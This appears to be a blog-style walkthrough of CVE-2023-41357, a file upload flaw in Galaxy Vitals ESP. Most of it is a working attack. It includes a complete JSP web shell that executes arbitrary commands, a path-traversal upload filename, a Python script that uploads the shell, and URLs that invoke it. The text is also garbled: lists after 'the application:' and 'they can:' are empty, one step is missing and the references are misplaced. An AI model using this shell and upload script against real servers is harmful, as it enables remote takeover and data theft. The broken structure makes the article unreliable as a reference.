In September 2023, Galaxy Software Services Corporation’s Vitals ESP—their online knowledge base management portal—was found to have a severe file upload vulnerability. Tracked as CVE-2023-41357, this flaw allows an attacker with ordinary user access to upload malicious scripts and execute arbitrary code on the server. This article breaks down the vulnerability, its impact, and shows you step-by-step how it could be exploited under real-world conditions.
What is Galaxy Software Services Vitals ESP?
Vitals ESP is a centralized platform for organizations to store, manage, and share internal knowledge. Its core features include document upload, sharing, and advanced search.
- Official site: Galaxy Vitals ESP Overview (Chinese)
The Vulnerability: Insufficient Upload Filtering
When a user uploads a file, the server should check the file type, extension, and scan for malicious content before saving it. In this case, CVE-2023-41357 means the application:
Why is this dangerous?
If an attacker can upload and execute a script (like a .jsp, .php, .aspx, or .exe file), they can:
References
- NVD - CVE-2023-41357
- Galaxy Software Vitals ESP - Product Page
- TW-CERT Advisory (Chinese)
1. Identify the Upload Endpoint
Upon logging in, look for the file upload feature (e.g., for document sharing). Use browser developer tools (F12) to inspect the upload request.
Example request
POST /uploadServlet HTTP/1.1
Host: vitals-esp.target.com
Cookie: JSESSIONID=XXXXX
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
...
2. Attempt to Upload a Dangerous File
Let’s say Vitals ESP is running on a Windows or Linux server, and supports Java web apps (e.g., .jsp).
webshell.jsp
<%@ page import="java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
int c;
while ((c = in.read()) != -1) out.print((char)c);
in.close();
}
%>
Upload this file via the web portal’s document upload feature.
4. Path Traversal
Some flawed upload features let you specify the destination path, or will store files in predictable locations. Try changing the request or upload parameters.
For instance
Content-Disposition: form-data; name="file"; filename="../../webapps/ROOT/webshell.jsp"
Once uploaded, you can access
http://vitals-esp.target.com/uploads/webshell.jsp?cmd=whoami
And get the output of any system command, like whoami, id, or even netstat.
Here’s a basic exploitation procedure with Python and requests
import requests
url = 'http://vitals-esp.target.com/uploadServlet';
cookies = {'JSESSIONID': 'YOUR_SESSION_ID'}
files = {
'file': ('webshell.jsp', open('webshell.jsp', 'rb'), 'application/octet-stream')
}
data = {
'other_form_fields': 'values'
}
response = requests.post(url, files=files, data=data, cookies=cookies)
print(response.text)
Now, visit the uploaded file via
http://vitals-esp.target.com/uploads/webshell.jsp?cmd=whoami
Fix & Recommendation
Galaxy Software Services released patches to address this vulnerability.
Conclusion
CVE-2023-41357 is a classic case of how missing file validation can jeopardize system security—even if an attacker only has a general login. By exploiting weak filtering, attackers can plant web shells and take full control! Always validate and sanitize uploads, treat all users' input as potentially hostile, and stay up-to-date with the latest patches.
For more details and updates on this CVE, visit
Timeline
Published on: 11/03/2023 07:15:14 UTC
Last modified on: 11/13/2023 19:54:51 UTC